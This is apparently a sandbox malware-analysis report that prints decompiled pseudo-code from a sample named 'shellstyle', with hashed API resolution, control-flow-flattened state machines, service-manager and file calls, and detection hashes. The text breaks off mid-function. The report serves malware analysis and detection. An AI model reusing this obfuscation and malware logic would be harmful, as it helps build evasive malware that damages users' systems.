                                                                                0x003d3ad6
                                                                                0x003d3ad8
                                                                                0x003d3adf
                                                                                0x003d3af2
                                                                                0x003d3af7
                                                                                0x003d3af7
                                                                                0x003d3b0b
                                                                                0x003d3b0d
                                                                                0x003d3b12
                                                                                0x003d3b17
                                                                                0x003d3b2a
                                                                                0x003d3b2f
                                                                                0x003d3b2f
                                                                                0x003d3b36
                                                                                0x003d3b38
                                                                                0x003d3b3f
                                                                                0x003d3b52
                                                                                0x003d3b57
                                                                                0x003d3b57
                                                                                0x003d3b60
                                                                                0x003d3b62
                                                                                0x003d3b66
                                                                                0x00000000
                                                                                0x003d3a70
                                                                                0x003d3a75
                                                                                0x00000000
                                                                                0x003d3a77
                                                                                0x003d3a77
                                                                                0x003d3a7e
                                                                                0x003d3a91
                                                                                0x003d3a96
                                                                                0x003d3a96
                                                                                0x003d3aa1
                                                                                0x003d3aa5
                                                                                0x003d3aac
                                                                                0x00000000
                                                                                0x003d3aac
                                                                                0x003d3a75
                                                                                0x00000000

                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 003D3A48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291884694.00000000003D1000.00000020.00000001.sdmp, Offset: 003D0000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2291878567.00000000003D0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291914976.00000000003DD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291932650.00000000003DF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_3d0000_shellstyle.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID: .
                                                                                • API String ID: 1974802433-248832578
                                                                                • Opcode ID: f76911ef7fb7783cb562374f40c831b9e70ff89795a36df1070af1133554ced8
                                                                                • Instruction ID: 77ccd9ff810202d8a40b5f88bca69c45d5de97613a6b658ee0a9bbdb3263f6ee
                                                                                • Opcode Fuzzy Hash: f76911ef7fb7783cb562374f40c831b9e70ff89795a36df1070af1133554ced8
                                                                                • Instruction Fuzzy Hash: 0151F2737452014BCB26AB68B895B7B37AEDB91704F01092BF456CB391EA75CF058393
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D5040, Relevance: 1.7, APIs: 1, Instructions: 248memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 61%
                                                                                			E003D5040(intOrPtr __ecx, intOrPtr __edx) {
				char _v4;
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				void* _v36;
				intOrPtr _v44;
				signed int _v52;
				void* _v68;
				void* __ebx;
				void* __ebp;
				void* _t16;
				void* _t17;
				void* _t23;
				void* _t26;
				void* _t29;
				void* _t31;
				void* _t35;
				void* _t37;
				void* _t41;
				void* _t42;
				void* _t45;
				void* _t50;
				void* _t51;
				void* _t52;
				signed int _t53;
				void* _t58;
				intOrPtr* _t101;
				void* _t103;
				signed int _t104;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t112;
				void* _t115;
				void* _t116;

				_t101 = _v12;
				_t58 = 0;
				_v16 = __edx;
				_t112 = 0;
				_v20 = __ecx;
				_t104 = 0x1ca940c1;
				while(1) {
					_t16 = _v28;
					while(1) {
						L2:
						_t115 = _t104 - 0x12f72f95;
						if(_t115 <= 0) {
							break;
						}
						__eflags = _t104 - 0x26342ffd;
						if(__eflags > 0) {
							__eflags = _t104 - 0x2fab56c4;
							if(_t104 != 0x2fab56c4) {
								goto L40;
							} else {
								_t17 =  *0x3de494;
								__eflags = _t17;
								if(_t17 == 0) {
									_t17 = E003D3E60(_t58, E003D3F00(0x9bab0b12), 0x7facde30, _t112);
									 *0x3de494 = _t17;
								}
								_t105 =  *_t17();
								__eflags =  *0x3ddd18;
								if( *0x3ddd18 == 0) {
									 *0x3ddd18 = E003D3E60(_t58, E003D3F00(0x9bab0b12), 0x9ff0609c, _t112);
								}
								_t16 = RtlAllocateHeap(_t105, 8, 0x20000); // executed
								_t58 = _t16;
								__eflags = _t58;
								if(_t58 != 0) {
									_t104 = 0x8956eec;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t23 =  *0x3de484;
								__eflags = _t23;
								if(_t23 == 0) {
									_t23 = E003D3E60(_t58, E003D3F00(0x26f5757c), 0x9e91db81, _t112);
									 *0x3de484 = _t23;
								}
								 *_t23(_v24, 1, _t112, 0x2000,  &_v4);
								asm("sbb esi, esi");
								_t26 =  *0x3de18c;
								_t104 = (_t104 & 0x0b23632b) + 0x5d498c4;
								__eflags = _t26;
								if(_t26 == 0) {
									_t26 = E003D3E60(_t58, E003D3F00(0x26f5757c), 0x268fe5f0, _t112);
									 *0x3de18c = _t26;
								}
								_t16 =  *_t26(_v44);
								goto L40;
							} else {
								__eflags = _t104 - 0x1ca940c1;
								if(_t104 == 0x1ca940c1) {
									_t104 = 0x2fab56c4;
									continue;
								} else {
									__eflags = _t104 - 0x254bd927;
									if(_t104 != 0x254bd927) {
										L40:
										__eflags = _t104 - 0x1f0f293e;
										if(_t104 != 0x1f0f293e) {
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										}
									} else {
										_t50 =  *0x3de29c;
										__eflags = _t50;
										if(_t50 == 0) {
											_t50 = E003D3E60(_t58, E003D3F00(0x26f5757c), 0x4574c66, _t112);
											 *0x3de29c = _t50;
										}
										_t51 =  *_t50(_v20, 0, 0x30, 3, _t58, 0x20000,  &_v8,  &_v12, 0, 0);
										__eflags = _t51;
										if(_t51 == 0) {
											L13:
											_t104 = 0x11e09e52;
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										} else {
											_t52 =  *0x3dde08;
											__eflags = _t52;
											if(_t52 == 0) {
												_t52 = E003D3E60(_t58, E003D3F00(0x9bab0b12), 0xd8ef4c49, _t112);
												 *0x3dde08 = _t52;
											}
											_t53 =  *_t52();
											_t104 = 0x128dff18;
											_t103 = _t58 + (_t53 & 0x0000001f) * 0x2c;
											_t16 = _t58 + _v52 * 0x2c;
											__eflags = _t103 - _t16;
											_v68 = _t16;
											_t101 =  >=  ? _t58 : _t103;
											continue;
										}
										L55:
									}
								}
							}
						}
						L54:
						return _t16;
						goto L55;
					}
					if(_t115 == 0) {
						_t29 =  *0x3de494;
						__eflags = _t29;
						if(_t29 == 0) {
							_t29 = E003D3E60(_t58, E003D3F00(0x9bab0b12), 0x7facde30, _t112);
							 *0x3de494 = _t29;
						}
						_t107 =  *_t29();
						_t31 =  *0x3ddf30;
						__eflags = _t31;
						if(_t31 == 0) {
							_t31 = E003D3E60(_t58, E003D3F00(0x9bab0b12), 0x5010a54d, _t112);
							 *0x3ddf30 = _t31;
						}
						return  *_t31(_t107, 0, _t58);
					}
					_t116 = _t104 - 0x10f7fbef;
					if(_t116 > 0) {
						__eflags = _t104 - 0x11e09e52;
						if(_t104 == 0x11e09e52) {
							_t35 =  *0x3de494;
							__eflags = _t35;
							if(_t35 == 0) {
								_t35 = E003D3E60(_t58, E003D3F00(0x9bab0b12), 0x7facde30, _t112);
								 *0x3de494 = _t35;
							}
							_t108 =  *_t35();
							_t37 =  *0x3ddf30;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E003D3E60(_t58, E003D3F00(0x9bab0b12), 0x5010a54d, _t112);
								 *0x3ddf30 = _t37;
							}
							 *_t37(_t108, 0, _t112);
							_t104 = 0x12f72f95;
							continue;
						} else {
							__eflags = _t104 - 0x128dff18;
							if(_t104 != 0x128dff18) {
								goto L40;
							} else {
								_t41 =  *0x3de270;
								__eflags = _t41;
								if(_t41 == 0) {
									_t41 = E003D3E60(_t58, E003D3F00(0x26f5757c), 0x56e230f9, _t112);
									 *0x3de270 = _t41;
								}
								_t42 =  *_t41(_v20,  *_t101, 1);
								__eflags = _t42;
								_v36 = _t42;
								_t104 =  !=  ? 0x26342ffd : 0x5d498c4;
								while(1) {
									_t16 = _v28;
									goto L2;
								}
							}
						}
					} else {
						if(_t116 == 0) {
							_t45 =  *0x3de200;
							__eflags = _t45;
							if(_t45 == 0) {
								_t45 = E003D3E60(_t58, E003D3F00(0x26f5757c), 0x16d40839, _t112);
								 *0x3de200 = _t45;
							}
							 *_t45(_v16, 1, _t112);
							goto L13;
						} else {
							if(_t104 == 0x5d498c4) {
								_t101 = _t101 + 0x2c;
								__eflags = _t101 - _t16;
								asm("sbb esi, esi");
								_t104 = (_t104 & 0x00ad60c6) + 0x11e09e52;
								goto L2;
							} else {
								if(_t104 != 0x8956eec) {
									goto L40;
								} else {
									_t112 = E003D42C0(_t58, 0x2000);
									_t104 =  !=  ? 0x254bd927 : 0x12f72f95;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						}
					}
					goto L54;
				}
			}









































                                                                                0x003d5047
                                                                                0x003d504b
                                                                                0x003d504d
                                                                                0x003d5051
                                                                                0x003d5053
                                                                                0x003d5057
                                                                                0x003d505c
                                                                                0x003d505c
                                                                                0x003d5060
                                                                                0x003d5060
                                                                                0x003d5060
                                                                                0x003d5066
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003d51af
                                                                                0x003d51b5
                                                                                0x003d52f9
                                                                                0x003d52ff
                                                                                0x00000000
                                                                                0x003d5301
                                                                                0x003d5301
                                                                                0x003d5306
                                                                                0x003d5308
                                                                                0x003d531b
                                                                                0x003d5320
                                                                                0x003d5320
                                                                                0x003d5327
                                                                                0x003d532e
                                                                                0x003d5330
                                                                                0x003d5348
                                                                                0x003d5348
                                                                                0x003d5355
                                                                                0x003d5357
                                                                                0x003d5359
                                                                                0x003d535b
                                                                                0x003d535d
                                                                                0x003d505c
                                                                                0x003d505c
                                                                                0x00000000
                                                                                0x003d505c
                                                                                0x003d505c
                                                                                0x003d535b
                                                                                0x003d51bb
                                                                                0x003d51bb
                                                                                0x003d5277
                                                                                0x003d527c
                                                                                0x003d527e
                                                                                0x003d5291
                                                                                0x003d5296
                                                                                0x003d5296
                                                                                0x003d52ac
                                                                                0x003d52b0
                                                                                0x003d52b2
                                                                                0x003d52bd
                                                                                0x003d52c3
                                                                                0x003d52c5
                                                                                0x003d52d8
                                                                                0x003d52dd
                                                                                0x003d52dd
                                                                                0x003d52e6
                                                                                0x00000000
                                                                                0x003d51c1
                                                                                0x003d51c1
                                                                                0x003d51c7
                                                                                0x003d526d
                                                                                0x00000000
                                                                                0x003d51cd
                                                                                0x003d51cd
                                                                                0x003d51d3
                                                                                0x003d52e8
                                                                                0x003d52e8
                                                                                0x003d52ee
                                                                                0x003d505c
                                                                                0x003d505c
                                                                                0x00000000
                                                                                0x003d505c
                                                                                0x003d505c
                                                                                0x003d51d9
                                                                                0x003d51d9
                                                                                0x003d51de
                                                                                0x003d51e0
                                                                                0x003d51f3
                                                                                0x003d51f8
                                                                                0x003d51f8
                                                                                0x003d521b
                                                                                0x003d521d
                                                                                0x003d521f
                                                                                0x003d50ef
                                                                                0x003d50ef
                                                                                0x003d505c
                                                                                0x003d505c
                                                                                0x00000000
                                                                                0x003d505c
                                                                                0x003d5225
                                                                                0x003d5225
                                                                                0x003d522a
                                                                                0x003d522c
                                                                                0x003d523f
                                                                                0x003d5244
                                                                                0x003d5244
                                                                                0x003d5249
                                                                                0x003d524e
                                                                                0x003d525b
                                                                                0x003d525d
                                                                                0x003d525f
                                                                                0x003d5261
                                                                                0x003d5265
                                                                                0x00000000
                                                                                0x003d5265
                                                                                0x00000000
                                                                                0x003d521f
                                                                                0x003d51d3
                                                                                0x003d51c7
                                                                                0x003d51bb
                                                                                0x003d53c0
                                                                                0x003d53c0
                                                                                0x00000000
                                                                                0x003d53c0
                                                                                0x003d506c
                                                                                0x003d5367
                                                                                0x003d536c
                                                                                0x003d536e
                                                                                0x003d5381
                                                                                0x003d5386
                                                                                0x003d5386
                                                                                0x003d538d
                                                                                0x003d538f
                                                                                0x003d5394
                                                                                0x003d5396
                                                                                0x003d53a9
                                                                                0x003d53ae
                                                                                0x003d53ae
                                                                                0x00000000
                                                                                0x003d53b7
                                                                                0x003d5072
                                                                                0x003d5078
                                                                                0x003d50f9
                                                                                0x003d50ff
                                                                                0x003d5153
                                                                                0x003d5158
                                                                                0x003d515a
                                                                                0x003d516d
                                                                                0x003d5172
                                                                                0x003d5172
                                                                                0x003d5179
                                                                                0x003d517b
                                                                                0x003d5180
                                                                                0x003d5182
                                                                                0x003d5195
                                                                                0x003d519a
                                                                                0x003d519a
                                                                                0x003d51a3
                                                                                0x003d51a5
                                                                                0x00000000
                                                                                0x003d5101
                                                                                0x003d5101
                                                                                0x003d5107
                                                                                0x00000000
                                                                                0x003d510d
                                                                                0x003d510d
                                                                                0x003d5112
                                                                                0x003d5114
                                                                                0x003d5127
                                                                                0x003d512c
                                                                                0x003d512c
                                                                                0x003d5139
                                                                                0x003d513b
                                                                                0x003d513d
                                                                                0x003d514b
                                                                                0x003d505c
                                                                                0x003d505c
                                                                                0x00000000
                                                                                0x003d505c
                                                                                0x003d505c
                                                                                0x003d5107
                                                                                0x003d507a
                                                                                0x003d507a
                                                                                0x003d50c2
                                                                                0x003d50c7
                                                                                0x003d50c9
                                                                                0x003d50dc
                                                                                0x003d50e1
                                                                                0x003d50e1
                                                                                0x003d50ed
                                                                                0x00000000
                                                                                0x003d507c
                                                                                0x003d5082
                                                                                0x003d50ad
                                                                                0x003d50b0
                                                                                0x003d50b2
                                                                                0x003d50ba
                                                                                0x00000000
                                                                                0x003d5084
                                                                                0x003d508a
                                                                                0x00000000
                                                                                0x003d5090
                                                                                0x003d509a
                                                                                0x003d50a8
                                                                                0x003d505c
                                                                                0x003d505c
                                                                                0x00000000
                                                                                0x003d505c
                                                                                0x003d505c
                                                                                0x003d508a
                                                                                0x003d5082
                                                                                0x003d507a
                                                                                0x00000000
                                                                                0x003d5078

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,003D8AC8,?,3251FEFE,?,?), ref: 003D5355
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291884694.00000000003D1000.00000020.00000001.sdmp, Offset: 003D0000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2291878567.00000000003D0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291914976.00000000003DD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291932650.00000000003DF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_3d0000_shellstyle.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 8af863c504e34466ed180a5e2e33fbb3369dc147b431fcf199457433f8047cc7
                                                                                • Instruction ID: b23d40ca4c0bee37c14511f45b1f0610c9fed67becf12d588dd1e31abcb6c739
                                                                                • Opcode Fuzzy Hash: 8af863c504e34466ed180a5e2e33fbb3369dc147b431fcf199457433f8047cc7
                                                                                • Instruction Fuzzy Hash: 2B81D133B457154BDB16BB79BC9172A3BEEAB94744F02082BF811DF391EA208D044782
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D9860, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 195serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 73%
                                                                                			E003D9860() {
				char _v524;
				unsigned int _v528;
				char _v536;
				void* _v544;
				void* __ebx;
				void* __ebp;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t62;
				void* _t64;
				void* _t69;
				void* _t72;
				void* _t92;
				void* _t93;
				intOrPtr _t94;
				void* _t97;
				void* _t98;

				_t64 = 0;
				_t28 = 0x29f9e503;
				_t92 = _v528;
				_t2 = _t64 + 1; // 0x1
				_t94 = _t2;
				goto L1;
				do {
					while(1) {
						L1:
						_t97 = _t28 - 0x13fee53b;
						if(_t97 > 0) {
							break;
						}
						if(_t97 == 0) {
							__eflags =  *0x3de310;
							if( *0x3de310 == 0) {
								 *0x3de310 = E003D3E60(_t64, E003D3F00(0x26f5757c), 0x9ba7cd1, _t94);
							}
							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t92 = _t49;
							__eflags = _t92;
							if(_t92 == 0) {
								_t28 = 0x23c48583;
							} else {
								_t50 =  *0x3de54c; // 0x5be240
								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
								_t28 = 0xc471eb;
							}
							continue;
						} else {
							_t98 = _t28 - 0x9835f84;
							if(_t98 > 0) {
								__eflags = _t28 - 0xc0f0991;
								if(_t28 != 0xc0f0991) {
									goto L36;
								} else {
									_t69 =  *0x3ddbd8;
									__eflags = _t69;
									if(_t69 == 0) {
										_t69 = E003D3E60(_t64, E003D3F00(0xd9518805), 0x141622d6, _t94);
										 *0x3ddbd8 = _t69;
									}
									_t53 =  *0x3de54c; // 0x5be240
									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
									__eflags = _t56;
									_t28 = 0x9835f84;
									_t64 =  ==  ? _t94 : _t64;
									continue;
								}
							} else {
								if(_t98 == 0) {
									E003D7C60(_t94);
									_t28 = 0x6addd5c;
									continue;
								} else {
									if(_t28 == 0xc471eb) {
										_v528 = 0xc1a3;
										_t28 = 0x179ed98e;
										_v528 = _v528 + 0xffff1ad7;
										_v528 = _v528 ^ 0xffffdc53;
										continue;
									} else {
										if(_t28 != 0x6addd5c) {
											goto L36;
										} else {
											_t60 =  *0x3de3f4;
											if(_t60 == 0) {
												_t60 = E003D3E60(_t64, E003D3F00(0x9bab0b12), 0x7dc9b9bb, _t94);
												 *0x3de3f4 = _t60;
											}
											 *_t60(0,  &_v524, 0x104);
											_t62 = E003D3D00( &_v536);
											_t72 =  *0x3de54c; // 0x5be240
											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
											_t28 = 0x39ea8110;
											continue;
										}
									}
								}
							}
						}
						L42:
					}
					__eflags = _t28 - 0x29f9e503;
					if(__eflags > 0) {
						__eflags = _t28 - 0x39ea8110;
						if(_t28 == 0x39ea8110) {
							_t29 =  *0x3ddbd8;
							__eflags = _t29;
							if(_t29 == 0) {
								_t29 = E003D3E60(_t64, E003D3F00(0xd9518805), 0x141622d6, _t94);
								 *0x3ddbd8 = _t29;
							}
							 *_t29(0, 0x25, 0, 0,  &_v524);
							_t31 =  *0x3de54c; // 0x5be240
							_t32 = _t31 + 0x234;
							__eflags = _t31 + 0x234;
							E003D3040(_t32);
							goto L41;
						} else {
							goto L36;
						}
					} else {
						if(__eflags == 0) {
							_t37 =  *0x3de494;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E003D3E60(_t64, E003D3F00(0x9bab0b12), 0x7facde30, _t94);
								 *0x3de494 = _t37;
							}
							_t93 =  *_t37();
							_t39 =  *0x3ddd18;
							__eflags = _t39;
							if(_t39 == 0) {
								_t39 = E003D3E60(_t64, E003D3F00(0x9bab0b12), 0x9ff0609c, _t94);
								 *0x3ddd18 = _t39;
							}
							_t40 =  *_t39(_t93, 8, 0x480);
							 *0x3de54c = _t40;
							__eflags = _t40;
							if(_t40 == 0) {
								L41:
								return _t64;
							} else {
								 *((intOrPtr*)(_t40 + 4)) = E003D7E40;
								_t28 = 0x13fee53b;
								goto L1;
							}
						} else {
							__eflags = _t28 - 0x179ed98e;
							if(_t28 == 0x179ed98e) {
								__eflags =  *0x3de18c;
								if( *0x3de18c == 0) {
									 *0x3de18c = E003D3E60(_t64, E003D3F00(0x26f5757c), 0x268fe5f0, _t94);
								}
								CloseServiceHandle(_t92); // executed
								_t28 = 0xc0f0991;
								goto L1;
							} else {
								__eflags = _t28 - 0x23c48583;
								if(_t28 != 0x23c48583) {
									goto L36;
								} else {
									_v528 = 0x5332;
									_v528 = _v528 << 6;
									_v528 = _v528 >> 0xf;
									_v528 = _v528 + 0xffffb18f;
									_v528 = _v528 >> 3;
									_v528 = _v528 ^ 0x1ffff62b;
									_t47 =  *0x3de54c; // 0x5be240
									 *((intOrPtr*)(_t47 + 8)) = 0x3d7e30;
									_t28 = 0xc0f0991;
									goto L1;
								}
							}
						}
					}
					goto L42;
					L36:
					__eflags = _t28 - 0x305b3459;
				} while (_t28 != 0x305b3459);
				return _t64;
				goto L42;
			}






























                                                                                0x003d9868
                                                                                0x003d986a
                                                                                0x003d9871
                                                                                0x003d9875
                                                                                0x003d9875
                                                                                0x003d9878
                                                                                0x003d9880
                                                                                0x003d9880
                                                                                0x003d9880
                                                                                0x003d9880
                                                                                0x003d9885
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003d988b
                                                                                0x003d9993
                                                                                0x003d9995
                                                                                0x003d99ad
                                                                                0x003d99ad
                                                                                0x003d99bb
                                                                                0x003d99bd
                                                                                0x003d99bf
                                                                                0x003d99c1
                                                                                0x003d99d8
                                                                                0x003d99c3
                                                                                0x003d99c3
                                                                                0x003d99c8
                                                                                0x003d99ce
                                                                                0x003d99ce
                                                                                0x00000000
                                                                                0x003d9891
                                                                                0x003d9891
                                                                                0x003d9896
                                                                                0x003d9936
                                                                                0x003d993b
                                                                                0x00000000
                                                                                0x003d9941
                                                                                0x003d9941
                                                                                0x003d9947
                                                                                0x003d9949
                                                                                0x003d9961
                                                                                0x003d9963
                                                                                0x003d9963
                                                                                0x003d9969
                                                                                0x003d997d
                                                                                0x003d997f
                                                                                0x003d9981
                                                                                0x003d9986
                                                                                0x00000000
                                                                                0x003d9986
                                                                                0x003d989c
                                                                                0x003d989c
                                                                                0x003d9927
                                                                                0x003d992c
                                                                                0x00000000
                                                                                0x003d98a2
                                                                                0x003d98a7
                                                                                0x003d9905
                                                                                0x003d990d
                                                                                0x003d9912
                                                                                0x003d991a
                                                                                0x00000000
                                                                                0x003d98a9
                                                                                0x003d98ae
                                                                                0x00000000
                                                                                0x003d98b4
                                                                                0x003d98b4
                                                                                0x003d98bb
                                                                                0x003d98ce
                                                                                0x003d98d3
                                                                                0x003d98d3
                                                                                0x003d98e4
                                                                                0x003d98ea
                                                                                0x003d98ef
                                                                                0x003d98f5
                                                                                0x003d98fb
                                                                                0x00000000
                                                                                0x003d98fb
                                                                                0x003d98ae
                                                                                0x003d98a7
                                                                                0x003d989c
                                                                                0x003d9896
                                                                                0x00000000
                                                                                0x003d988b
                                                                                0x003d99e2
                                                                                0x003d99e7
                                                                                0x003d9ae3
                                                                                0x003d9ae8
                                                                                0x003d9b02
                                                                                0x003d9b07
                                                                                0x003d9b09
                                                                                0x003d9b1c
                                                                                0x003d9b21
                                                                                0x003d9b21
                                                                                0x003d9b33
                                                                                0x003d9b35
                                                                                0x003d9b3e
                                                                                0x003d9b3e
                                                                                0x003d9b44
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003d99ed
                                                                                0x003d99ed
                                                                                0x003d9a73
                                                                                0x003d9a78
                                                                                0x003d9a7a
                                                                                0x003d9a8d
                                                                                0x003d9a92
                                                                                0x003d9a92
                                                                                0x003d9a99
                                                                                0x003d9a9b
                                                                                0x003d9aa0
                                                                                0x003d9aa2
                                                                                0x003d9ab5
                                                                                0x003d9aba
                                                                                0x003d9aba
                                                                                0x003d9ac7
                                                                                0x003d9ac9
                                                                                0x003d9ace
                                                                                0x003d9ad0
                                                                                0x003d9b4f
                                                                                0x003d9b58
                                                                                0x003d9ad2
                                                                                0x003d9ad2
                                                                                0x003d9ad9
                                                                                0x00000000
                                                                                0x003d9ad9
                                                                                0x003d99f3
                                                                                0x003d99f3
                                                                                0x003d99f8
                                                                                0x003d9a47
                                                                                0x003d9a49
                                                                                0x003d9a61
                                                                                0x003d9a61
                                                                                0x003d9a67
                                                                                0x003d9a69
                                                                                0x00000000
                                                                                0x003d99fa
                                                                                0x003d99fa
                                                                                0x003d99ff
                                                                                0x00000000
                                                                                0x003d9a05
                                                                                0x003d9a05
                                                                                0x003d9a0d
                                                                                0x003d9a12
                                                                                0x003d9a17
                                                                                0x003d9a1f
                                                                                0x003d9a24
                                                                                0x003d9a2c
                                                                                0x003d9a31
                                                                                0x003d9a38
                                                                                0x00000000
                                                                                0x003d9a38
                                                                                0x003d99ff
                                                                                0x003d99f8
                                                                                0x003d99ed
                                                                                0x00000000
                                                                                0x003d9aea
                                                                                0x003d9aea
                                                                                0x003d9aea
                                                                                0x003d9b01
                                                                                0x00000000

                                                                                APIs
                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,005BE228), ref: 003D997D
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 003D99BB
                                                                                • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 003D9A67
                                                                                • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 003D9B33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2291884694.00000000003D1000.00000020.00000001.sdmp, Offset: 003D0000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2291878567.00000000003D0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291914976.00000000003DD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000A.00000002.2291932650.00000000003DF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_3d0000_shellstyle.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FolderPath$CloseHandleManagerOpenService
                                                                                • String ID: 2S$@[$Y4[0
                                                                                • API String ID: 2382770032-2554921241
                                                                                • Opcode ID: 4f7587a9e6afb7a943e9c25a893b2fd417990df69d38cd6c91b041943f01c7f0
                                                                                • Instruction ID: f317983e3dd6d4777d369703a8eb160b8881d8d8fcb71d0526a651b71c9fe58e
                                                                                • Opcode Fuzzy Hash: 4f7587a9e6afb7a943e9c25a893b2fd417990df69d38cd6c91b041943f01c7f0
                                                                                • Instruction Fuzzy Hash: BF61C233B052055BEB1AAF68BC9576A379EEB91B08F15042FF105DF391EA30CD059B92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D8400, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 105 3d8400-3d84df 106 3d84e3-3d84e9 105->106 107 3d84ef 106->107 108 3d85c8-3d85ce 106->108 109 3d866c-3d86b4 call 3db6e0 107->109 110 3d84f5-3d84fb 107->110 111 3d8630-3d8637 108->111 112 3d85d0-3d85d6 108->112 124 3d85bd-3d85c7 109->124 131 3d86ba 109->131 116 3d84fd-3d8503 110->116 117 3d854a-3d8551 110->117 114 3d8639-3d864f call 3d3f00 call 3d3e60 111->114 115 3d8654-3d8667 111->115 118 3d85d8-3d85e0 112->118 119 3d85b1-3d85b7 112->119 114->115 115->106 125 3d8505-3d850b 116->125 126 3d8543-3d8548 116->126 122 3d856e-3d8591 117->122 123 3d8553-3d8569 call 3d3f00 call 3d3e60 117->123 127 3d8600-3d8624 CreateFileW 118->127 128 3d85e2-3d85fa call 3d3f00 call 3d3e60 118->128 119->106 119->124 146 3d85ae 122->146 147 3d8593-3d85a9 call 3d3f00 call 3d3e60 122->147 123->122 125->119 129 3d8511-3d8518 125->129 126->106 127->124 132 3d8626-3d862b 127->132 128->127 136 3d851a-3d8530 call 3d3f00 call 3d3e60 129->136 137 3d8535-3d8541 129->137 140 3d86bc-3d86be 131->140 141 3d86c4-3d86d1 131->141 132->106 136->137 137->106 140->124 140->141 146->119 147->146
                                                                                C-Code - Quality: 66%
                                                                                			E003D8400(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t75;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				signed int _t119;
				void* _t121;
				void* _t122;
				signed int _t123;
				intOrPtr _t124;
				void* _t126;
				void* _t129;

				_t126 = __ebp;
				_t101 = __ebx;
				_v584 = 0xdbec;
				_v584 = _v584 + 0xa437;
				_v584 = _v584 | 0x0afcf5fb;
				_v584 = _v584 ^ 0x9493ba05;
				_v584 = _v584 >> 0xc;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 ^ 0x000001bc;
				_v592 = 0x7d19;
				_v592 = _v592 << 9;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 + 0xffff07e5;
				_v592 = _v592 | 0x8aea6eef;
				_v592 = _v592 + 0xd867;
				_v592 = _v592 + 0x9c41;
				_v592 = _v592 + 0x3de0;
				_v592 = _v592 + 0x218b;
				_v592 = _v592 ^ 0x00014403;
				_v588 = 0x2591;
				_t123 = 0x4a20241;
				_v588 = _v588 * 0x7d;
				_v588 = _v588 + 0x8d68;
				_v588 = _v588 + 0xffff8911;
				_v588 = _v588 * 0x6a;
				_v588 = _v588 + 0xffff93d5;
				_v588 = _v588 ^ 0x07a13cd2;
				_v580 = 0x789;
				_v580 = _v580 >> 1;
				_v580 = _v580 ^ 0xaee58af2;
				_v580 = _v580 ^ 0xaee58936;
				_t122 = _v580;
				goto L1;
				do {
